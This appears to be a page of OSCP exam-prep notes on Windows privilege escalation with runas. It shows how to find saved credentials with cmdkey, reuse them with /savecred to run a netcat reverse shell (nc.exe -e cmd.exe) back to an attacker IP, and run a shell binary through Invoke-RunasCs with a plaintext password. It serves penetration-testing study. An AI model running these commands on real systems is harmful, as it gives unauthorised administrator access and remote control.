> For the complete documentation index, see [llms.txt](https://oscp.adot8.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://oscp.adot8.com/windows-privilege-escalation/runas.md).

# RunAs

## Overview

The **RunAs** command can be thought of as the **sudo** command in Linux. It allows you to run a command as someone else, aka the Administrator

## Escalation via RunAs

Check for stored credentials

```powerquery
cmdkey /list
```

Execute a command as Administrator

```powerquery
C:\Windows\System32\runas.exe /user:ACCESS\Administrator /savecred "C:\Users\security\nc.exe -e cmd.exe 10.10.14.10 1339"
```

Command Layout&#x20;

* C:\Windows\System32\runas.exe                                      use runas.exe
* /user:ACCESS\Administrator                                              use user Administrator
* /savescred                                                                                use the saved credentials
* "C:\Windows\System32\nc.exe                                           to run nc.exe as Administrator
* 10.10.14.10 1339                                                                        and connect back to hackerman

{% embed url="<https://github.com/antonioCoco/RunasCs/blob/master/Invoke-RunasCs.ps1>" %}

```
Import-module .\Invoke-RunasCs.ps1
```

```
Invoke-RunasCs svc_mssql trustno1 'C:\progrmadata\shell.exe'
```
